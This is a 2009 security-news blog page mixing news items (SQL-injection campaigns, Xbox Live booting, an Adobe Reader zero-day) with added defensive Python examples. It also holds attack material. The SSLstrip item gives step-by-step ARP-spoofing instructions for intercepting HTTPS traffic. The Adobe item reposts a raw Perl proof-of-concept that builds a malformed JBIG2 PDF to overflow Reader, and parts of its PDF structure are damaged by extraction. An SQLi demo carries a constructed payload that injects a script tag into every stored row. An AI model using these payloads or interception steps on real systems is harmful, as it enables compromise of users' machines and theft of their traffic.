Feb 26 2009

SQL Injection attacks compromised 500,000 sites in 2008

Breach Security has released its annual Web Hacking Incidents Database (WHID) report. The focus is on the massive SQL Injection (SQLi) attacks seen online last year, and according to the data, more than 500,000 sites were compromised. The report states that SQLi attacks, carried out with the aim of planting malware on the compromised site, were the number one attack vector of 2008.

WHID

The WHID report explains that three SQLi bots were active in 2008: Nihaorr1, Asprox, and Evolution. It notes that while the initial attack vector was SQLi, the attacks overall more closely resembled Cross-Site Scripting, since the end goal was to inject malicious JavaScript into the victim’s browser. Moreover, the attacks were not after information on the server; they were after the website’s own user base, taking advantage of a legitimate resource and exploiting the trust users place in it.
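As an added illustration (not part of the Tech Herald article or the WHID report), the Python snippet below shows the pattern behind an SQLi attack whose payload is a script tag rather than stolen data: a query built by string concatenation lets a stacked UPDATE append the tag to every stored row, while the parameterised form stores the same input as inert text. The table, the payload and the script URL are constructed for the example; the functions and their names are mine.

```python
import sqlite3

# Constructed for this example: a one-table content store standing in for a
# site's database. The script URL is a placeholder, not a real indicator.
SCRIPT_TAG = '<script src="http://example.invalid/x.js"></script>'

# Constructed payload in the style the 2008 bots used: it closes the quoted
# value, stacks an UPDATE that appends the tag to every row, and comments
# out the remainder of the original statement.
PAYLOAD = "x'); UPDATE comments SET body = body || '" + SCRIPT_TAG + "'; --"


def make_db():
    """Fresh in-memory database holding one legitimate row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO comments (body) VALUES ('first post')")
    conn.commit()
    return conn


def save_comment_vulnerable(conn, body):
    """Builds the SQL text from user input, so the input can rewrite the query.
    executescript() is used because the deployments hit in 2008 accepted
    stacked statements; sqlite3's single execute() would refuse them."""
    sql = "INSERT INTO comments (body) VALUES ('" + body + "')"
    conn.executescript(sql)
    conn.commit()


def save_comment_safe(conn, body):
    """Parameterised query: the input is bound as data, never parsed as SQL."""
    conn.execute("INSERT INTO comments (body) VALUES (?)", (body,))
    conn.commit()


def all_bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM comments ORDER BY id")]


def rows_containing(conn, needle):
    """Defender-side check: ids of stored rows that carry the given text."""
    return [row[0] for row in conn.execute(
        "SELECT id FROM comments WHERE body LIKE ? ORDER BY id", ("%" + needle + "%",))]


def demo():
    vuln = make_db()
    save_comment_vulnerable(vuln, PAYLOAD)
    safe = make_db()
    save_comment_safe(safe, PAYLOAD)
    return {
        "vulnerable": all_bodies(vuln),
        "vulnerable_tainted_ids": rows_containing(vuln, "<script"),
        "safe": all_bodies(safe),
        "safe_tainted_ids": rows_containing(safe, "<script"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

In the vulnerable run the pre-existing row is modified too, which is what made the 2008 campaigns visible as whole sites serving the same script tag. In the safe run only the attacker's own row contains the literal text; parameterisation stops the input from altering the query, but that stored text still has to be HTML-escaped when rendered, or it becomes an ordinary stored XSS.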

Another interesting aspect of the report centers on the site defacements seen in 2008.

Source: Tech Herald
http://tinyurl.com/dhoc7j

Feb 26 2009

Hackers target Xbox Live players

Halo 3
Xbox Live is being targeted by malicious hackers selling services that kick players off the network.

The booting services are proving popular with players who want a way to get revenge on those who beat them in an Xbox Live game.

The attackers are employing data flooding tools that have been used against websites for many years.

Microsoft is “investigating” the use of the tools and said those caught using them would be banned from Xbox Live.

Source: BBC News
http://news.bbc.co.uk/2/hi/technology/7888369.stm

Feb 26 2009

SSLstrip – HTTPS Stripping Attack Tool

This tool provides a demonstration of HTTPS stripping attacks.
It transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.

To get this running:
* Flip your machine into forwarding mode.
* Set up iptables to redirect HTTP traffic to sslstrip.
* Run sslstrip.
* Run arpspoof to convince a network they should send their traffic to you.

That should do it.

How does this work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.
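The first step described above, arpspoof making the target believe the attacker's MAC is the router's, leaves a trace in the victim's own ARP cache. As an added example (not part of sslstrip or the original post), here is a small Python detector that parses successive `arp -an` snapshots and raises an alert when the gateway's MAC changes or when the gateway's MAC is also claimed by another IP. The snapshots, addresses and function names are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed snapshots of a host's ARP cache in `arp -an` format, taken a
# few seconds apart. Addresses are made up; in the third snapshot the gateway
# IP suddenly resolves to the MAC of another host on the LAN.
SNAPSHOTS = [
    """? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.20) at 66:77:88:99:aa:bb [ether] on eth0""",
    """? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.20) at 66:77:88:99:aa:bb [ether] on eth0""",
    """? (192.168.1.1) at 66:77:88:99:aa:bb [ether] on eth0
? (192.168.1.20) at 66:77:88:99:aa:bb [ether] on eth0""",
]
GATEWAY = "192.168.1.1"

ARP_LINE = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9A-Fa-f:]{17})")


def parse_arp(text):
    """Return [(ip, mac), ...] from `arp -an` style output; MACs lower-cased."""
    return [(ip, mac.lower()) for ip, mac in ARP_LINE.findall(text)]


def detect(snapshots, gateway):
    """Two heuristics for the ARP-cache poisoning step:
    1. an IP whose MAC changes between snapshots (alerted for every IP,
       but the gateway is the one that matters for traffic interception);
    2. the gateway's MAC simultaneously claimed by another IP, i.e. one
       interface answering for two addresses."""
    alerts = []
    baseline = {}  # ip -> most recently seen MAC
    for idx, snap in enumerate(snapshots):
        by_mac = defaultdict(list)
        for ip, mac in parse_arp(snap):
            by_mac[mac].append(ip)
            if ip in baseline and baseline[ip] != mac:
                alerts.append({"snapshot": idx, "kind": "mac-change", "ip": ip,
                               "old": baseline[ip], "new": mac})
            baseline[ip] = mac
        for mac, ips in by_mac.items():
            if gateway in ips and len(ips) > 1:
                alerts.append({"snapshot": idx, "kind": "gateway-mac-shared",
                               "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SNAPSHOTS, GATEWAY):
        print(alert)
```

Both heuristics also fire when the gateway hardware is legitimately replaced, so they are a prompt for investigation rather than proof of an attack. A static ARP entry for the gateway on sensitive hosts, or dynamic ARP inspection on the switch, removes the poisoning step the whole technique depends on.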

Download :
http://www.thoughtcrime.org/software/sslstrip/

Feb 25 2009

Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

# The "<< ... >>" dictionaries below lost their contents when this page was
# extracted (they survive only as "<>" and "< ]"); they are left as shown.
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;

print pdf();

sub pdf()
{

"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"< ]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
" \n" .
"4 0 obj\n" .
"<>>>>>\n" .
"endobj\n" .
" \n" .
"5 0 obj\n" .
"<>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<>\n" .
"stream\n" .
# the escaped quote after \x99k is assumed; the extracted page shows a typographic quote there
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k\"\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .

"12 0 obj\n" .
"<>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<>\n" .
"endobj\n" .
"14 0 obj\n" .
"<>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .

"1 0 obj\n" .
"<>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"< ]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";

}

# milw0rm.com [2009-02-23]

Feb 23 2009

Hackers targeting zero-day vulnerability on Adobe Reader and Acrobat

Hackers are targeting a zero-day vulnerability affecting Adobe Reader and Acrobat with malicious PDF files. Adobe officials say a fix for the issue will be available for Adobe Reader and Adobe Acrobat in the coming weeks.

Hackers have once again turned to PDF files to spread their wares, this time assaulting a zero-day flaw affecting Adobe Reader and Acrobat.

Fortunately, the unpatched bug is on the company’s radar, and fixes for Adobe Reader 9 and Acrobat 9 are slated to be available March 11. Updates for earlier versions will come later, company officials said in an advisory.

The bug is due to an error in the parsing of certain structures in PDF files. If exploited successfully, the bug could allow a hacker to take complete control of a vulnerable system.
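The PoC above and this eWeek item describe the same thing from two sides: a crafted PDF whose JBIG2 image stream the parser mishandles. As an added example (not part of the exploit, the blog, or either article), here is a small Python triage script of the kind a mail gateway or incident responder could use: it lists the stream objects in a PDF, flags those declaring the JBIG2Decode filter, and reports where the declared /Length disagrees with the bytes actually present. The sample PDF bytes, object numbers and lengths are constructed for the example. The regex approach is a triage shortcut, not a PDF parser: object streams, cross-reference streams and encrypted files are not handled, and a clean result is not a clean bill of health.

```python
import re

# Constructed sample file for this example (not the page's PoC): three stream
# objects, two of them declaring the JBIG2Decode filter. Object 9 declares a
# /Length that does not match the bytes actually present.
SAMPLE_PDF = b"".join([
    b"%PDF-1.5\n",
    b"7 0 obj\n<< /Type /XObject /Subtype /Image /Width 8 /Height 8"
    b" /Filter /JBIG2Decode /Length 5 >>\nstream\n",
    b"\x00\x00\x00\x01\x30", b"\nendstream\nendobj\n",
    b"8 0 obj\n<< /Length 20 /Filter /FlateDecode >>\nstream\n",
    b"x" * 20, b"\nendstream\nendobj\n",
    b"9 0 obj\n<< /Filter /JBIG2Decode /Length 16 >>\nstream\n",
    b"A" * 64, b"\nendstream\nendobj\n",
    b"%%EOF\n",
])

# One object carrying a stream: "N G obj << dict >> stream ... endstream".
# Non-greedy matching relies on every matched object actually having a stream.
STREAM_OBJ = re.compile(
    rb"(\d+)\s+\d+\s+obj\s*<<(.*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
# /Length as a direct integer; an indirect reference ("12 0 R") is reported as unknown.
LENGTH = re.compile(rb"/Length\s+(\d+)(\s+\d+\s+R)?")


def scan(pdf):
    """One finding per stream object: filter, declared vs actual length."""
    findings = []
    for m in STREAM_OBJ.finditer(pdf):
        num, dictionary, body = int(m.group(1)), m.group(2), m.group(3)
        lm = LENGTH.search(dictionary)
        declared = int(lm.group(1)) if lm and not lm.group(2) else None
        findings.append({
            "obj": num,
            "jbig2": b"/JBIG2Decode" in dictionary,
            "declared": declared,
            "actual": len(body),
            "mismatch": declared is not None and declared != len(body),
        })
    return findings


def jbig2_objects(findings):
    """Every object that would reach the JBIG2 decoder."""
    return [f["obj"] for f in findings if f["jbig2"]]


def inconsistent_jbig2(findings):
    """JBIG2 streams whose size cannot be confirmed from the dictionary."""
    return [f["obj"] for f in findings
            if f["jbig2"] and (f["mismatch"] or f["declared"] is None)]


if __name__ == "__main__":
    report = scan(SAMPLE_PDF)
    for f in report:
        print(f)
    print("JBIG2 streams:", jbig2_objects(report))
    print("JBIG2 streams with unconfirmed size:", inconsistent_jbig2(report))
```

While a fix is pending, the useful output is the list of JBIG2 streams itself: a document from an untrusted sender that carries one deserves to be opened in a sandbox or not at all, and a declared length that disagrees with the data is the cheap first sign that the file was assembled by a script rather than a PDF writer.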

Source: eWeek
http://tinyurl.com/bzqfly